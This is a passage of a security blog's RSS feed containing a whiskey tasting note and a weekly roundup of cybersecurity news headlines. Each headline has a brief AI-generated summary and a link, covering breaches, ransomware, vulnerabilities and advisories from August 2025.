<hr>

<p>While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun...
Most of the articles are in English, but some current warnings might be in German.</p>
]]></content:encoded>
      <author>📰wrzlbrmpft&#39;s cyberlights💥</author>
      <guid>https://infosec.press/read/a/j0wheei07k</guid>
      <pubDate>Sun, 31 Aug 2025 19:30:35 +0000</pubDate>
    </item>
    <item>
      <title>Cracked open an Elijah Craig Barrel Proof batch A125.</title>
      <link>https://infosec.press/beveragenotes/cracked-open-an-elijah-craig-barrel-proof-batch-a125</link>
      <description>&lt;![CDATA[Cracked open an Elijah Craig Barrel Proof batch A125. It&#39;s a 10 year, 7 month aged product weighing in at 118.2 proof.&#xA;&#xA;Smell some cinnamon, oak, and hints of cardamom and amburana.&#xA;&#xA;First sip, sans water or ice--which I&#39;m sure I&#39;ll need!--, reminds me of amburana aged whiskies. Some leather. Didn&#39;t pick up a lot of strong flavors. The swallow is fire. Moving straight to some water! LOL.&#xA;&#xA;After adding some filtered water, I pick up some caramel creme brûlée. The heat dies down, but still lingers. Smell of amburana has intensified--which may or may not be psychosomatic, I really like the smell. Next sips pick up some cherry. The finish seems to hint at some citrus. Still quite hot, so time to try out some ice.&#xA;&#xA;Smells much sweeter after adding some ice... ...honey, maybe? Pick up more cherry with a &#34;brighter&#34; sip. The finish is reminiscent of a cab or a Barolo. Not the tannin bit.&#xA;&#xA;An interesting dram. Off to just enjoy it.&#xA;&#xA;Cheers!]]&gt;</description>
      <content:encoded><![CDATA[<p>Cracked open an Elijah Craig Barrel Proof batch A125. It&#39;s a 10 year, 7 month aged product weighing in at 118.2 proof.</p>

<p>Smell some cinnamon, oak, and hints of cardamom and amburana.</p>

<p>First sip, sans water or ice—which I&#39;m sure I&#39;ll need!—, reminds me of amburana aged whiskies. Some leather. Didn&#39;t pick up a lot of strong flavors. The swallow is fire. Moving straight to some water! LOL.</p>

<p>After adding some filtered water, I pick up some caramel creme brûlée. The heat dies down, but still lingers. Smell of amburana has intensified—which may or may not be psychosomatic, I really like the smell. Next sips pick up some cherry. The finish seems to hint at some citrus. Still quite hot, so time to try out some ice.</p>

<p>Smells much sweeter after adding some ice... ...honey, maybe? Pick up more cherry with a “brighter” sip. The finish is reminiscent of a cab or a Barolo. Not the tannin bit.</p>

<p>An interesting dram. Off to just enjoy it.</p>

<p>Cheers!</p>
]]></content:encoded>
      <author>beverageNotes</author>
      <guid>https://infosec.press/read/a/h34t4qm6sp</guid>
      <pubDate>Tue, 26 Aug 2025 22:34:42 +0000</pubDate>
    </item>
    <item>
      <title>cyberlights - week 34/2025</title>
      <link>https://infosec.press/wrzlbrmpfts-cyberlights/cyberlights-week-34-2025</link>
      <description>&lt;![CDATA[A weekly shortlist of cyber security highlights.&#xA;The short summaries are AI generated! If something is wrong, please let me know!&#xA;&#xA;---&#xA;News For All&#xA;🚦 Dutch prosecution service attack keeps speed cameras offline&#xA;cybercrime - A cyberattack on the Dutch Public Prosecution Service has left numerous speed cameras offline. While the attack didn&#39;t target the cameras directly, it hampers their reactivation due to system interconnectivity.&#xA;https://www.theregister.com/2025/08/15/cyberattackondutchprosecutionservice/&#xA;&#xA;🎟️ Gefälschtes Gewinnspiel für Wiener Linien Jahreskarte im Umlauf&#xA;warning - Fake Facebook posts are promoting a bogus contest for a Wiener Linien half-year ticket. The scam aims to steal credit card and personal information through a deceptive website.&#xA;https://www.watchlist-internet.at/news/gefaelschtes-gewinnspiel-fuer-wiener-linien-jahreskarte-im-umlauf/&#xA;&#xA;🔒 Multiple Vulnerabilities in Microsoft Products&#xA;warning - Microsoft&#39;s August 2025 Patch Tuesday advisory addresses 111 security vulnerabilities, with 16 critical ones. Users are urged to update systems promptly, especially public-facing assets.&#xA;https://cert.europa.eu/publications/security-advisories/2025-032/&#xA;&#xA;🤖 Grok Exposes Underlying Prompts for Its AI Personas: ‘EVEN PUTTING THINGS IN YOUR ASS’&#xA;security research - Elon Musk&#39;s AI chatbot Grok has revealed prompts for its various personas, including a conspiracist character. This exposure raises concerns about the chatbot&#39;s design and potential influence on users.&#xA;https://www.404media.co/grok-exposes-underlying-prompts-for-its-ai-personas-even-putting-things-in-your-ass/&#xA;&#xA;🔓 HR giant Workday says hackers stole personal data in recent breach&#xA;data breach - Workday confirmed a data breach involving the theft of personal information from a third-party database, raising concerns about potential social engineering scams. Details on affected individuals remain unclear.&#xA;https://techcrunch.com/2025/08/18/hr-giant-workday-says-hackers-stole-personal-data-in-recent-breach/&#xA;&#xA;🔐 Allianz Life data breach affects 1.1 million customers&#xA;data breach - A data breach at Allianz Life has compromised the personal information of 1.1 million customers, including Social Security numbers. The breach is linked to the hacking group ShinyHunters.&#xA;https://techcrunch.com/2025/08/18/allianz-life-data-breach-affects-1-1-million-customers/&#xA;&#xA;🔑 UK drops demand for backdoor into Apple encryption&#xA;privacy - The UK government has abandoned its demand for a backdoor into Apple’s encryption, potentially allowing Apple to restore Advanced Data Protection (ADP) iCloud encryption services in the UK.&#xA;https://www.theverge.com/news/761240/uk-apple-us-encryption-back-door-demands-dropped&#xA;&#xA;🚓 Speed cameras knocked out after cyber attack&#xA;security news - A cyberattack on the Netherlands&#39; Public Prosecution Service has rendered many speed cameras inoperable, impacting road safety and delaying legal proceedings as the organization remains offline.&#xA;https://www.bitdefender.com/en-us/blog/hotforsecurity/speed-cameras-knocked-out-after-cyber-attack&#xA;&#xA;🎤 Officials gain control of Rapper Bot DDoS botnet, charge lead developer and administrator&#xA;cybercrime - Authorities have taken control of the powerful Rapper Bot DDoS botnet and charged its developer, Ethan Foltz, with aiding computer intrusions. The botnet conducted over 370,000 attacks worldwide since 2021.&#xA;https://cyberscoop.com/rapper-bot-ddos-botnet-disrupted/&#xA;&#xA;💊 Pharmaceutical firm Inotiv discloses ransomware attack. Qilin group claims responsibility for the hack&#xA;data breach - Inotiv has reported a ransomware attack that encrypted systems and disrupted operations. The Qilin group claimed responsibility, alleging they stole 176GB of data from the firm.&#xA;https://securityaffairs.com/181311/data-breach/pharmaceutical-firm-inotiv-discloses-ransomware-attack-qilin-group-claims-responsibility-for-the-hack.html&#xA;&#xA;⚠️ Critical Chrome Flaw CVE‑2025‑9132 Exposes Browsers to Remote Code Execution&#xA;vulnerability - A remote code execution flaw in Google Chrome, CVE-2025-9132, was discovered in the V8 JavaScript engine, allowing attackers to execute arbitrary code. Users are urged to update to version 139.0.7258.138 or later to mitigate risks.&#xA;https://thecyberexpress.com/chrome-v8-vulnerability-cve%E2%80%912025%E2%80%919132/&#xA;&#xA;🍔 McDonald&#39;s not lovin&#39; it when hacker exposes rotten security&#xA;security news - A white-hat hacker uncovered severe security flaws in McDonald&#39;s portals, enabling free food orders and access to sensitive data. The company has since made some fixes but still lacks a proper security disclosure process.&#xA;https://www.theregister.com/2025/08/20/mcdonaldsterriblesecurity/&#xA;&#xA;🤦‍♂Researcher Exposes Zero-Day Clickjacking Vulnerabilities in Major Password Managers&#xA;vulnerability - A researcher revealed serious clickjacking vulnerabilities in popular password managers, enabling hackers to easily steal sensitive data if users visit malicious sites. Many remain unpatched.&#xA;https://socket.dev/blog/password-manager-clickjacking&#xA;&#xA;📞 Major Belgian telecom firm says cyberattack compromised data on 850,000 accounts&#xA;data breach - Orange Belgium reported a cyberattack that compromised data from 850,000 customer accounts, including names and phone numbers. No critical data like passwords or financial details were hacked.&#xA;https://therecord.media/belgian-telecom-says-cyberattack-compromised-data-on-850000&#xA;&#xA;👓 Harvard dropouts to launch &#39;always on&#39; AI smart glasses that listen and record every conversation&#xA;privacy - Former Harvard students are launching Halo X, AI-powered smart glasses that record conversations and provide real-time information. Privacy advocates raise concerns about covert recording and consent laws.&#xA;https://techcrunch.com/2025/08/20/harvard-dropouts-to-launch-always-on-ai-smart-glasses-that-listen-and-record-every-conversation/&#xA;&#xA;📸 &#39;Screenshot-grabbing&#39; Chrome VPN extension still available&#xA;privacy - The FreeVPN.One Chrome extension has been found capturing users&#39; screenshots and sending them to a remote server without consent. Despite warnings, it remains available on the Chrome Web Store.&#xA;https://www.theregister.com/2025/08/21/freevpnprivacyresearch/&#xA;&#xA;🕵️‍♂️ Hackers who exposed North Korean government hacker explain why they did it&#xA;cybercrime - Two hackers infiltrated a North Korean government hacker&#39;s computer, uncovering evidence of cyberespionage. They decided to leak their findings to expose the operations and help victims, despite legal risks.&#xA;https://techcrunch.com/2025/08/21/hackers-who-exposed-north-korean-government-hacker-explain-why-they-did-it/&#xA;&#xA;🔒 Apple rushes out fix for active zero-day in iOS and macOS&#xA;vulnerability - Apple released emergency updates for a zero-day vulnerability in its ImageIO framework, allowing potential device hijacking through malicious image files. The flaw has reportedly been exploited in targeted attacks.&#xA;https://www.theregister.com/2025/08/21/appleimageioexploit/&#xA;&#xA;🎥 Real Footage Combined With AI Slop About DC Is Creating a Disinformation Mess on TikTok&#xA;security news - TikTok is flooded with misleading videos combining real and AI-generated footage about the National Guard&#39;s actions in D.C., complicating viewers&#39; ability to discern truth from misinformation amidst a trending disinformation campaign.&#xA;https://www.404media.co/real-footage-combined-with-a-ai-slop-about-dc-is-creating-a-disinformation-mess-on-tiktok/&#xA;&#xA;🔍 Criminal background checker APCS faces data breach&#xA;data breach - Access Personal Checking Services (APCS) is managing a data breach linked to a third-party developer, Intradev, which compromised customer data including personal details. An investigation is ongoing.&#xA;https://www.theregister.com/2025/08/22/apcsbreach/&#xA;&#xA;🚨 Europol says Telegram post about 50,000 Qilin ransomware award is fake&#xA;cybercrime - A fake Telegram post claimed Europol was offering a $50,000 reward for information on Qilin ransomware gang members. Europol confirmed the announcement was false and originated from a newly created account.&#xA;https://www.bitdefender.com/en-us/blog/hotforsecurity/europol-says-telegram-post-about-50-000-qilin-ransomware-award-is-fake&#xA;&#xA;🏥 DaVita tells 2.4M people ransomware scum stole health data&#xA;data breach - DaVita confirmed a ransomware breach affecting 2.4 million individuals, compromising sensitive health and personal information. The Interlock ransomware gang is suspected to be behind the attack.&#xA;https://www.theregister.com/2025/08/22/davitaransomwareinfection/&#xA;&#xA;---&#xA;Some More, For the Curious&#xA;🏢 Coinbase CEO says he&#39;s mandating in-person orientation to combat North Korean hackers seeking remote jobs&#xA;security news - Coinbase is shifting to in-person orientations to prevent North Korean hackers from exploiting remote work. New policies include US citizenship requirements and stricter security measures.&#xA;https://www.businessinsider.com/coinbase-north-korea-threats-remote-work-2025-8&#xA;&#xA;🎭 How attackers are using Active Directory Federation Services to phish with legit office.com links&#xA;security research - Phishers exploit Microsoft services by redirecting users from legitimate links to malicious sites, utilizing techniques like ADFSjacking. This complicates detection efforts and highlights the growing threat landscape.&#xA;https://pushsecurity.com/blog/phishing-with-active-directory-federation-services/&#xA;&#xA;🔍 How Researchers Collect Indicators of Compromise&#xA;cyber defense - Security researchers analyze malware like Snake Keylogger to gather indicators of compromise and create detection signatures. They focus on exfiltration techniques and utilize tools to improve threat detection.&#xA;https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/how-researchers-collect-indicators-of-compromise/&#xA;&#xA;📡 Boffins release 5G traffic sniffing tool&#xA;security research - Researchers have launched Sni5Gect, an open-source tool for sniffing 5G traffic and executing connection downgrade attacks. It exploits vulnerabilities in pre-authentication communication to inject malicious payloads.&#xA;https://www.theregister.com/2025/08/18/sni5gect/&#xA;&#xA;⚠️ New HTTP/2 DoS Vulnerability Prompts Vendor and Project Fixes&#xA;vulnerability - A newly discovered HTTP/2 DoS vulnerability, CVE-2025-8671, allows attackers to bypass concurrency limits, causing denial of service. Vendors are rapidly addressing the flaw, which affects unpatched server implementations.&#xA;https://thecyberexpress.com/new-http-2-dos-vulnerability/&#xA;&#xA;🩹 Apache ActiveMQ attackers patch critical vuln after entry&#xA;security news - Attackers exploiting a critical Apache ActiveMQ vulnerability have installed malware called DripDropper to maintain persistence on infected Linux servers and subsequently patched the original flaw.&#xA;https://www.theregister.com/2025/08/19/apacheactivemqpatchmalware/&#xA;&#xA;🤳 Stop Spoofing Yourself! Disabling M365 Direct Send&#xA;cyber defense - Threat actors are exploiting Microsoft 365&#39;s Direct Send feature to spoof emails within organizations. Users can now disable Direct Send with a simple command, enhancing security against these attacks.&#xA;https://www.blackhillsinfosec.com/disabling-m365-direct-send/&#xA;&#xA;🧷 Commvault releases patches for two pre-auth RCE bug chains&#xA;vulnerability - Commvault has patched two critical remote code execution vulnerabilities following their disclosure by researchers. Users are urged to update immediately, as the flaws could allow unauthenticated attackers to gain admin access.&#xA;https://www.theregister.com/2025/08/20/commvaultbugchainspatched/&#xA;&#xA;🚗 Inside the Underground Trade of ‘Flipper Zero’ Tech to Break into Cars&#xA;security research - The Flipper Zero device, known for its hacking capabilities, is being used in an underground market to unlock various car models, with hackers selling software to exploit vulnerabilities.&#xA;https://www.404media.co/inside-the-underground-trade-of-flipper-zero-tech-to-break-into-cars/&#xA;&#xA;🖼️ Honey, I shrunk the image and now I&#39;m pwned&#xA;vulnerability - Researchers at Trail of Bits revealed that image scaling attacks can exploit Google Gemini and other AI systems, allowing hidden prompts to exfiltrate data. Google downplays the issue, citing non-default configurations.&#xA;https://www.theregister.com/2025/08/21/googlegeminiimagescalingattack/&#xA;&#xA;🔒 Microsoft cuts off China&#39;s early access to bug disclosures&#xA;security news - Microsoft has halted providing proof-of-concept exploit code to Chinese companies in its MAPP program following exploitation of SharePoint vulnerabilities. The change aims to prevent leaks and improve security measures.&#xA;https://www.theregister.com/2025/08/21/microsoftcutschinasearly_access/&#xA;&#xA;---&#xA;CISA Corner&#xA;⚠️ CISA Adds One Known Exploited Vulnerability to Catalog&#xA;warning - CISA added a new vulnerability in Trend Micro Apex One to its Known Exploited Vulnerabilities Catalog.&#xA;https://www.cisa.gov/news-events/alerts/2025/08/18/cisa-adds-one-known-exploited-vulnerability-catalog&#xA;⚠️ CISA Adds One Known Exploited Vulnerability to Catalog&#xA;warning - CISA added a new vulnerability in Apple iOS, iPadOS and macOS to its Known Exploited Vulnerabilities Catalog.&#xA;https://www.cisa.gov/news-events/alerts/2025/08/21/cisa-adds-one-known-exploited-vulnerability-catalog&#xA;&#xA;⚙️ CISA Releases Four Industrial Control Systems Advisories&#xA;vulnerability - CISA issued four advisories detailing vulnerabilities in Industrial Control Systems by Siemens, Tigo and EG5.&#xA;https://www.cisa.gov/news-events/alerts/2025/08/19/cisa-releases-four-industrial-control-systems-advisories&#xA;⚙️ CISA Releases Three Industrial Control Systems Advisories&#xA;vulnerability - CISA issued three advisories detailing vulnerabilities in Mitsubishi Electric systems and FUJIFILM Healthcare&#39;s Synapse Mobility.&#xA;https://www.cisa.gov/news-events/alerts/2025/08/21/cisa-releases-three-industrial-control-systems-advisories&#xA;&#xA;---&#xA;While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun...&#xA;Most of the articles are in English, but some current warnings might be in German.]]&gt;</description>
      <content:encoded><![CDATA[<p>A weekly shortlist of cyber security highlights.
The short summaries are AI generated! If something is wrong, please let me know!</p>

<hr>

<h3 id="news-for-all">News For All</h3>

<p>🚦 Dutch prosecution service attack keeps speed cameras offline
<em>cybercrime – A cyberattack on the Dutch Public Prosecution Service has left numerous speed cameras offline. While the attack didn&#39;t target the cameras directly, it hampers their reactivation due to system interconnectivity.</em>
<a href="https://www.theregister.com/2025/08/15/cyberattack_on_dutch_prosecution_service/" rel="nofollow">https://www.theregister.com/2025/08/15/cyberattack_on_dutch_prosecution_service/</a></p>

<p>🎟️ Gefälschtes Gewinnspiel für Wiener Linien Jahreskarte im Umlauf
<em>warning – Fake Facebook posts are promoting a bogus contest for a Wiener Linien half-year ticket. The scam aims to steal credit card and personal information through a deceptive website.</em>
<a href="https://www.watchlist-internet.at/news/gefaelschtes-gewinnspiel-fuer-wiener-linien-jahreskarte-im-umlauf/" rel="nofollow">https://www.watchlist-internet.at/news/gefaelschtes-gewinnspiel-fuer-wiener-linien-jahreskarte-im-umlauf/</a></p>

<p>🔒 Multiple Vulnerabilities in Microsoft Products
<em>warning – Microsoft&#39;s August 2025 Patch Tuesday advisory addresses 111 security vulnerabilities, with 16 critical ones. Users are urged to update systems promptly, especially public-facing assets.</em>
<a href="https://cert.europa.eu/publications/security-advisories/2025-032/" rel="nofollow">https://cert.europa.eu/publications/security-advisories/2025-032/</a></p>

<p>🤖 Grok Exposes Underlying Prompts for Its AI Personas: ‘EVEN PUTTING THINGS IN YOUR ASS’
<em>security research – Elon Musk&#39;s AI chatbot Grok has revealed prompts for its various personas, including a conspiracist character. This exposure raises concerns about the chatbot&#39;s design and potential influence on users.</em>
<a href="https://www.404media.co/grok-exposes-underlying-prompts-for-its-ai-personas-even-putting-things-in-your-ass/" rel="nofollow">https://www.404media.co/grok-exposes-underlying-prompts-for-its-ai-personas-even-putting-things-in-your-ass/</a></p>

<p>🔓 HR giant Workday says hackers stole personal data in recent breach
<em>data breach – Workday confirmed a data breach involving the theft of personal information from a third-party database, raising concerns about potential social engineering scams. Details on affected individuals remain unclear.</em>
<a href="https://techcrunch.com/2025/08/18/hr-giant-workday-says-hackers-stole-personal-data-in-recent-breach/" rel="nofollow">https://techcrunch.com/2025/08/18/hr-giant-workday-says-hackers-stole-personal-data-in-recent-breach/</a></p>

<p>🔐 Allianz Life data breach affects 1.1 million customers
<em>data breach – A data breach at Allianz Life has compromised the personal information of 1.1 million customers, including Social Security numbers. The breach is linked to the hacking group ShinyHunters.</em>
<a href="https://techcrunch.com/2025/08/18/allianz-life-data-breach-affects-1-1-million-customers/" rel="nofollow">https://techcrunch.com/2025/08/18/allianz-life-data-breach-affects-1-1-million-customers/</a></p>

<p>🔑 UK drops demand for backdoor into Apple encryption
<em>privacy – The UK government has abandoned its demand for a backdoor into Apple’s encryption, potentially allowing Apple to restore Advanced Data Protection (ADP) iCloud encryption services in the UK.</em>
<a href="https://www.theverge.com/news/761240/uk-apple-us-encryption-back-door-demands-dropped" rel="nofollow">https://www.theverge.com/news/761240/uk-apple-us-encryption-back-door-demands-dropped</a></p>

<p>🚓 Speed cameras knocked out after cyber attack
<em>security news – A cyberattack on the Netherlands&#39; Public Prosecution Service has rendered many speed cameras inoperable, impacting road safety and delaying legal proceedings as the organization remains offline.</em>
<a href="https://www.bitdefender.com/en-us/blog/hotforsecurity/speed-cameras-knocked-out-after-cyber-attack" rel="nofollow">https://www.bitdefender.com/en-us/blog/hotforsecurity/speed-cameras-knocked-out-after-cyber-attack</a></p>

<p>🎤 Officials gain control of Rapper Bot DDoS botnet, charge lead developer and administrator
<em>cybercrime – Authorities have taken control of the powerful Rapper Bot DDoS botnet and charged its developer, Ethan Foltz, with aiding computer intrusions. The botnet conducted over 370,000 attacks worldwide since 2021.</em>
<a href="https://cyberscoop.com/rapper-bot-ddos-botnet-disrupted/" rel="nofollow">https://cyberscoop.com/rapper-bot-ddos-botnet-disrupted/</a></p>

<p>💊 Pharmaceutical firm Inotiv discloses ransomware attack. Qilin group claims responsibility for the hack
<em>data breach – Inotiv has reported a ransomware attack that encrypted systems and disrupted operations. The Qilin group claimed responsibility, alleging they stole 176GB of data from the firm.</em>
<a href="https://securityaffairs.com/181311/data-breach/pharmaceutical-firm-inotiv-discloses-ransomware-attack-qilin-group-claims-responsibility-for-the-hack.html" rel="nofollow">https://securityaffairs.com/181311/data-breach/pharmaceutical-firm-inotiv-discloses-ransomware-attack-qilin-group-claims-responsibility-for-the-hack.html</a></p>

<p>⚠️ Critical Chrome Flaw CVE‑2025‑9132 Exposes Browsers to Remote Code Execution
<em>vulnerability – A remote code execution flaw in Google Chrome, CVE-2025-9132, was discovered in the V8 JavaScript engine, allowing attackers to execute arbitrary code. Users are urged to update to version 139.0.7258.138 or later to mitigate risks.</em>
<a href="https://thecyberexpress.com/chrome-v8-vulnerability-cve%E2%80%912025%E2%80%919132/" rel="nofollow">https://thecyberexpress.com/chrome-v8-vulnerability-cve%E2%80%912025%E2%80%919132/</a></p>

<p>🍔 McDonald&#39;s not lovin&#39; it when hacker exposes rotten security
<em>security news – A white-hat hacker uncovered severe security flaws in McDonald&#39;s portals, enabling free food orders and access to sensitive data. The company has since made some fixes but still lacks a proper security disclosure process.</em>
<a href="https://www.theregister.com/2025/08/20/mcdonalds_terrible_security/" rel="nofollow">https://www.theregister.com/2025/08/20/mcdonalds_terrible_security/</a></p>

<p>🤦‍♂Researcher Exposes Zero-Day Clickjacking Vulnerabilities in Major Password Managers
<em>vulnerability – A researcher revealed serious clickjacking vulnerabilities in popular password managers, enabling hackers to easily steal sensitive data if users visit malicious sites. Many remain unpatched.</em>
<a href="https://socket.dev/blog/password-manager-clickjacking" rel="nofollow">https://socket.dev/blog/password-manager-clickjacking</a></p>

<p>📞 Major Belgian telecom firm says cyberattack compromised data on 850,000 accounts
<em>data breach – Orange Belgium reported a cyberattack that compromised data from 850,000 customer accounts, including names and phone numbers. No critical data like passwords or financial details were hacked.</em>
<a href="https://therecord.media/belgian-telecom-says-cyberattack-compromised-data-on-850000" rel="nofollow">https://therecord.media/belgian-telecom-says-cyberattack-compromised-data-on-850000</a></p>

<p>👓 Harvard dropouts to launch &#39;always on&#39; AI smart glasses that listen and record every conversation
<em>privacy – Former Harvard students are launching Halo X, AI-powered smart glasses that record conversations and provide real-time information. Privacy advocates raise concerns about covert recording and consent laws.</em>
<a href="https://techcrunch.com/2025/08/20/harvard-dropouts-to-launch-always-on-ai-smart-glasses-that-listen-and-record-every-conversation/" rel="nofollow">https://techcrunch.com/2025/08/20/harvard-dropouts-to-launch-always-on-ai-smart-glasses-that-listen-and-record-every-conversation/</a></p>

<p>📸 &#39;Screenshot-grabbing&#39; Chrome VPN extension still available
<em>privacy – The FreeVPN.One Chrome extension has been found capturing users&#39; screenshots and sending them to a remote server without consent. Despite warnings, it remains available on the Chrome Web Store.</em>
<a href="https://www.theregister.com/2025/08/21/freevpn_privacy_research/" rel="nofollow">https://www.theregister.com/2025/08/21/freevpn_privacy_research/</a></p>

<p>🕵️‍♂️ Hackers who exposed North Korean government hacker explain why they did it
<em>cybercrime – Two hackers infiltrated a North Korean government hacker&#39;s computer, uncovering evidence of cyberespionage. They decided to leak their findings to expose the operations and help victims, despite legal risks.</em>
<a href="https://techcrunch.com/2025/08/21/hackers-who-exposed-north-korean-government-hacker-explain-why-they-did-it/" rel="nofollow">https://techcrunch.com/2025/08/21/hackers-who-exposed-north-korean-government-hacker-explain-why-they-did-it/</a></p>

<p>🔒 Apple rushes out fix for active zero-day in iOS and macOS
<em>vulnerability – Apple released emergency updates for a zero-day vulnerability in its ImageIO framework, allowing potential device hijacking through malicious image files. The flaw has reportedly been exploited in targeted attacks.</em>
<a href="https://www.theregister.com/2025/08/21/apple_imageio_exploit/" rel="nofollow">https://www.theregister.com/2025/08/21/apple_imageio_exploit/</a></p>

<p>🎥 Real Footage Combined With AI Slop About DC Is Creating a Disinformation Mess on TikTok
<em>security news – TikTok is flooded with misleading videos combining real and AI-generated footage about the National Guard&#39;s actions in D.C., complicating viewers&#39; ability to discern truth from misinformation amidst a trending disinformation campaign.</em>
<a href="https://www.404media.co/real-footage-combined-with-a-ai-slop-about-dc-is-creating-a-disinformation-mess-on-tiktok/" rel="nofollow">https://www.404media.co/real-footage-combined-with-a-ai-slop-about-dc-is-creating-a-disinformation-mess-on-tiktok/</a></p>

<p>🔍 Criminal background checker APCS faces data breach
<em>data breach – Access Personal Checking Services (APCS) is managing a data breach linked to a third-party developer, Intradev, which compromised customer data including personal details. An investigation is ongoing.</em>
<a href="https://www.theregister.com/2025/08/22/apcs_breach/" rel="nofollow">https://www.theregister.com/2025/08/22/apcs_breach/</a></p>

<p>🚨 Europol says Telegram post about 50,000 Qilin ransomware award is fake
<em>cybercrime – A fake Telegram post claimed Europol was offering a $50,000 reward for information on Qilin ransomware gang members. Europol confirmed the announcement was false and originated from a newly created account.</em>
<a href="https://www.bitdefender.com/en-us/blog/hotforsecurity/europol-says-telegram-post-about-50-000-qilin-ransomware-award-is-fake" rel="nofollow">https://www.bitdefender.com/en-us/blog/hotforsecurity/europol-says-telegram-post-about-50-000-qilin-ransomware-award-is-fake</a></p>

<p>🏥 DaVita tells 2.4M people ransomware scum stole health data
<em>data breach – DaVita confirmed a ransomware breach affecting 2.4 million individuals, compromising sensitive health and personal information. The Interlock ransomware gang is suspected to be behind the attack.</em>
<a href="https://www.theregister.com/2025/08/22/davita_ransomware_infection/" rel="nofollow">https://www.theregister.com/2025/08/22/davita_ransomware_infection/</a></p>

<hr>

<h3 id="some-more-for-the-curious">Some More, For the Curious</h3>

<p>🏢 Coinbase CEO says he&#39;s mandating in-person orientation to combat North Korean hackers seeking remote jobs
<em>security news – Coinbase is shifting to in-person orientations to prevent North Korean hackers from exploiting remote work. New policies include US citizenship requirements and stricter security measures.</em>
<a href="https://www.businessinsider.com/coinbase-north-korea-threats-remote-work-2025-8" rel="nofollow">https://www.businessinsider.com/coinbase-north-korea-threats-remote-work-2025-8</a></p>

<p>🎭 How attackers are using Active Directory Federation Services to phish with legit office.com links
<em>security research – Phishers exploit Microsoft services by redirecting users from legitimate links to malicious sites, utilizing techniques like ADFSjacking. This complicates detection efforts and highlights the growing threat landscape.</em>
<a href="https://pushsecurity.com/blog/phishing-with-active-directory-federation-services/" rel="nofollow">https://pushsecurity.com/blog/phishing-with-active-directory-federation-services/</a></p>

<p>🔍 How Researchers Collect Indicators of Compromise
<em>cyber defense – Security researchers analyze malware like Snake Keylogger to gather indicators of compromise and create detection signatures. They focus on exfiltration techniques and utilize tools to improve threat detection.</em>
<a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/how-researchers-collect-indicators-of-compromise/" rel="nofollow">https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/how-researchers-collect-indicators-of-compromise/</a></p>

<p>📡 Boffins release 5G traffic sniffing tool
<em>security research – Researchers have launched Sni5Gect, an open-source tool for sniffing 5G traffic and executing connection downgrade attacks. It exploits vulnerabilities in pre-authentication communication to inject malicious payloads.</em>
<a href="https://www.theregister.com/2025/08/18/sni5gect/" rel="nofollow">https://www.theregister.com/2025/08/18/sni5gect/</a></p>

<p>⚠️ New HTTP/2 DoS Vulnerability Prompts Vendor and Project Fixes
<em>vulnerability – A newly discovered HTTP/2 DoS vulnerability, CVE-2025-8671, allows attackers to bypass concurrency limits, causing denial of service. Vendors are rapidly addressing the flaw, which affects unpatched server implementations.</em>
<a href="https://thecyberexpress.com/new-http-2-dos-vulnerability/" rel="nofollow">https://thecyberexpress.com/new-http-2-dos-vulnerability/</a></p>

<p>🩹 Apache ActiveMQ attackers patch critical vuln after entry
<em>security news – Attackers exploiting a critical Apache ActiveMQ vulnerability have installed malware called DripDropper to maintain persistence on infected Linux servers and subsequently patched the original flaw.</em>
<a href="https://www.theregister.com/2025/08/19/apache_activemq_patch_malware/" rel="nofollow">https://www.theregister.com/2025/08/19/apache_activemq_patch_malware/</a></p>

<p>🤳 Stop Spoofing Yourself! Disabling M365 Direct Send
<em>cyber defense – Threat actors are exploiting Microsoft 365&#39;s Direct Send feature to spoof emails within organizations. Users can now disable Direct Send with a simple command, enhancing security against these attacks.</em>
<a href="https://www.blackhillsinfosec.com/disabling-m365-direct-send/" rel="nofollow">https://www.blackhillsinfosec.com/disabling-m365-direct-send/</a></p>

<p>🧷 Commvault releases patches for two pre-auth RCE bug chains
<em>vulnerability – Commvault has patched two critical remote code execution vulnerabilities following their disclosure by researchers. Users are urged to update immediately, as the flaws could allow unauthenticated attackers to gain admin access.</em>
<a href="https://www.theregister.com/2025/08/20/commvault_bug_chains_patched/" rel="nofollow">https://www.theregister.com/2025/08/20/commvault_bug_chains_patched/</a></p>

<p>🚗 Inside the Underground Trade of ‘Flipper Zero’ Tech to Break into Cars
<em>security research – The Flipper Zero device, known for its hacking capabilities, is being used in an underground market to unlock various car models, with hackers selling software to exploit vulnerabilities.</em>
<a href="https://www.404media.co/inside-the-underground-trade-of-flipper-zero-tech-to-break-into-cars/" rel="nofollow">https://www.404media.co/inside-the-underground-trade-of-flipper-zero-tech-to-break-into-cars/</a></p>

<p>🖼️ Honey, I shrunk the image and now I&#39;m pwned
<em>vulnerability – Researchers at Trail of Bits revealed that image scaling attacks can exploit Google Gemini and other AI systems, allowing hidden prompts to exfiltrate data. Google downplays the issue, citing non-default configurations.</em>
<a href="https://www.theregister.com/2025/08/21/google_gemini_image_scaling_attack/" rel="nofollow">https://www.theregister.com/2025/08/21/google_gemini_image_scaling_attack/</a></p>

<p>🔒 Microsoft cuts off China&#39;s early access to bug disclosures
<em>security news – Microsoft has halted providing proof-of-concept exploit code to Chinese companies in its MAPP program following exploitation of SharePoint vulnerabilities. The change aims to prevent leaks and improve security measures.</em>
<a href="https://www.theregister.com/2025/08/21/microsoft_cuts_chinas_early_access/" rel="nofollow">https://www.theregister.com/2025/08/21/microsoft_cuts_chinas_early_access/</a></p>

<hr>

<h3 id="cisa-corner">CISA Corner</h3>

<p>⚠️ CISA Adds One Known Exploited Vulnerability to Catalog
<em>warning – CISA added a new vulnerability in Trend Micro Apex One to its Known Exploited Vulnerabilities Catalog.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/08/18/cisa-adds-one-known-exploited-vulnerability-catalog" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/08/18/cisa-adds-one-known-exploited-vulnerability-catalog</a>
⚠️ CISA Adds One Known Exploited Vulnerability to Catalog
<em>warning – CISA added a new vulnerability in Apple iOS, iPadOS and macOS to its Known Exploited Vulnerabilities Catalog.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/08/21/cisa-adds-one-known-exploited-vulnerability-catalog" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/08/21/cisa-adds-one-known-exploited-vulnerability-catalog</a></p>

<p>⚙️ CISA Releases Four Industrial Control Systems Advisories
